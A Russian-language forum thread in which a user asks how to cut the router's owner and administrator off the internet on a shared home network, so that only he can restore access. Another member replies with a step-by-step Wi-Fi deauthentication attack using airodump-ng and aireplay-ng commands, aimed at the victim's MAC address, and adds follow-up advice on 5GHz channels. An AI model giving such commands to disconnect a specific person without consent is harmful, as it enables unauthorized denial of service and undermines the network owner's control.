• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Дубль 2) | iptables | NETGEAR

romangaitur

Well-known member
20.06.2020
94
0
BIT
0
Дубль 2)

Добрый день! Это мой второй пост в котором я постараюсь изложить вопрос по другому. Еще раз извиняюсь за не понимания моего построения вопроса !

Я как и все другие пользователи нахожусь в домашней сети.
Подключен я через Ethernet кабель к роутэру от провайдера.
К роутэру от провайдера подключен еще один роутэр - так сказать внешний роутэр - NETGEAR.
А к NETGEAR подключенны все остальные пользователи через Wi-Fi.

Цель: Заблокировать доступ в интернет 1-ому пользователю который подключен через Wi-Fi. Главное что бы только я смог его разблокировать через команндную строку !

Проблема: NETGEAR сам по себе обеспечивает хорошую защиту - так как он нового года и имеет технологию для защиты.

Другое:
Я имею доступ только к главному роутэру от провайдера при входе на 192.168.1.1 - где описанно все подробности (подключенные устройства и другие настройки). Пароль в админку я не знаю - но если хочу войти и что то изменить получаю доступ через WPS. [Почему я это пишу - потому что я так смог бы увидеть ip адрес что бы заблокировать] - могло бы пригодится - но увы никого нет)
Я не имею доступ к NETGEAR (к которому подключенны все пользователи) - так как администратор пожет быть только 1 и только через приложение на Android/IOS. (продукт/NETGEAR зарегестрирован на него)

В простом роутэере я вижу что NETGEAR подключен к нему через Ethernet - но не вижу других пользователей кроме меня. То есть наверно если не ошибаюсь это называется подсеть. (поправьте).
Когда я подключен к NETGEAR в обычном роуэтере при вводе 192.168.1.1 я себя уже не вижу - потому что я в другом роуэтере. Вижу только NETGEAR который подключен через Ethernet.

В общем цель это что нужно отключить админа от интернета будь он подключен то ли к NETGEAR то ли к обычному роутэру.
Я могу подключится через Ethernet и к NETGEAR и к обычному роутэру - что бы осуществовать цель.
Хотел бы я это сделать через iptables таким оброзом админ не сможет себе востановить интернет - а только я через терминал в линуксе.

В общем как то так ! Еще раз извиняюсь если что то опять не так и что в некоторых местах я повторяюсь словами. Это для того что бы лучше картина была и лучше все понималась. (на логике)
->Я добавлю еще изображение что бы была общая картина всего.
На ней можно будет увидеть как админ может управлять всей сетью NETGEAR через телефон.
Он подключен через Wi-Fi к NETGEAR {через фирменое приложение от NETGEAR} - а также может подключится через Ethernet по надобности как и я - то ли могу к обычному роутэру то ли к Netgear (но я думаю это не важно).
+ я заметил что в
обыном роутере ip адреса идут 192.168.1.** А в NETGEAR они идут 10.0.0.* - поэтому писал что проблема .

Ну как то так) Если будут вопросы что бы подробнее где то написать/ответить пишите я отвечу. Заранее ОГРОМНОЕ ВАМ СПАСИБО !!!

// Если это называется подсеть или как то подругому то тоже ответьте // Буду благодарен!)
 

Вложения

  • Картинка.png
    Картинка.png
    8,9 КБ · Просмотры: 150
  • Интерфейс.png
    Интерфейс.png
    13,4 КБ · Просмотры: 137

f22

Codeby Academy
Gold Team
05.05.2019
1 841
225
BIT
1 042
Решение вашей задачи:
1. Найти/купить/одолжить любой wifi адаптер, поддерживающий monitor mode.
2. Подключить его в вашу Linux систему
3. Установить программу airodump-ng (входит в состав )
4. Запустить сканирование wi-fi диапазона
airodump-ng wlan1
5. Найти mac адрес (6 цифробуквенных блоков разделённых двоеточиями) точки доступа Netgear - первый столбец
и её канал - 6 столбец
01-3[1].jpg
6. Начать сканирование нужной ТД на нужном канале
airodump-ng wlan1 -d <mac> -c <channel>
7. Под стройкой
BSSID STATION PWR Rate Lost Frames Notes Probes
Будут появляться mac адреса устройств, которые подключаются к этой точке доступа.
Главная задача - найти нужное. Вариантов несколько - либо по времени подключения устройства, либо по производителю (первые 3 октета mac адреса - код производителя. можно узнать какого)
8. Узнав mac адрес запускаем атаку
aireplay-ng -0 0 -a <mac точки доступа> -c <mac устройства> wlan1
Устройство будет отключаться от сети пока запущена атака.
Profit
 

romangaitur

Well-known member
20.06.2020
94
0
BIT
0
Решение вашей задачи:
1. Найти/купить/одолжить любой wifi адаптер, поддерживающий monitor mode.
2. Подключить его в вашу Linux систему
3. Установить программу airodump-ng (входит в состав )
4. Запустить сканирование wi-fi диапазона
airodump-ng wlan1
5. Найти mac адрес (6 цифробуквенных блоков разделённых двоеточиями) точки доступа Netgear - первый столбец
и её канал - 6 столбец
Посмотреть вложение 44071
6. Начать сканирование нужной ТД на нужном канале
airodump-ng wlan1 -d <mac> -c <channel>
7. Под стройкой
BSSID STATION PWR Rate Lost Frames Notes Probes
Будут появляться mac адреса устройств, которые подключаются к этой точке доступа.
Главная задача - найти нужное. Вариантов несколько - либо по времени подключения устройства, либо по производителю (первые 3 октета mac адреса - код производителя. можно узнать какого)
8. Узнав mac адрес запускаем атаку
aireplay-ng -0 0 -a <mac точки доступа> -c <mac устройства> wlan1
Устройство будет отключаться от сети пока запущена атака.
Profit


Здравстуйте! Только что увидел ваш ответ на этом посту! Вы не представляйте как я рад что вы ответили!
Я все понял что нужно сделать !!! Огромное Вам спасибо!
У меня кстати есть в наличий Wi-Fi адаптер ALFA AWUS036 который сможет такое сделать ! Осталось только испольнить/вбить команды...
И да можно ли это сделать через виртуальную машину ? Просто я когда то такое делал но Кали был чисто утсановлен на жесткий диск.

Спасибо Вам ОГРОМНОЕ !
 

romangaitur

Well-known member
20.06.2020
94
0
BIT
0
Решение вашей задачи:
1. Найти/купить/одолжить любой wifi адаптер, поддерживающий monitor mode.
2. Подключить его в вашу Linux систему
3. Установить программу airodump-ng (входит в состав )
4. Запустить сканирование wi-fi диапазона
airodump-ng wlan1
5. Найти mac адрес (6 цифробуквенных блоков разделённых двоеточиями) точки доступа Netgear - первый столбец
и её канал - 6 столбец
Посмотреть вложение 44071
6. Начать сканирование нужной ТД на нужном канале
airodump-ng wlan1 -d <mac> -c <channel>
7. Под стройкой
BSSID STATION PWR Rate Lost Frames Notes Probes
Будут появляться mac адреса устройств, которые подключаются к этой точке доступа.
Главная задача - найти нужное. Вариантов несколько - либо по времени подключения устройства, либо по производителю (первые 3 октета mac адреса - код производителя. можно узнать какого)
8. Узнав mac адрес запускаем атаку
aireplay-ng -0 0 -a <mac точки доступа> -c <mac устройства> wlan1
Устройство будет отключаться от сети пока запущена атака.
Profit

У меня еще к вам один вопрос! Извините если не правильно напишу!
Дело в том что когда я пробывал это делать давно... то я замечал что при сканирование есть как бы диапозоны 2,4Гц - 5Гц так вот когда сканирование идет то проблем отключить пользователя подлкюченный на 2,4Гц НЕТ. А тот кто подключен к 5Гц то там чего то не хватало на сколько помню это Мак адресса или что то в этом роде.. Не могли бы обьяснить почему ? И что можно сделать ?
 

f22

Codeby Academy
Gold Team
05.05.2019
1 841
225
BIT
1 042
У меня еще к вам один вопрос! Извините если не правильно напишу!
Дело в том что когда я пробывал это делать давно... то я замечал что при сканирование есть как бы диапозоны 2,4Гц - 5Гц так вот когда сканирование идет то проблем отключить пользователя подлкюченный на 2,4Гц НЕТ. А тот кто подключен к 5Гц то там чего то не хватало на сколько помню это Мак адресса или что то в этом роде.. Не могли бы обьяснить почему ? И что можно сделать ?
Очень общий вопрос.
Отличие работы с 5ghz диапазоном только в номере канала.
2.4Ghz использует каналы 1-13, а 5Ghz 36 - 165
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!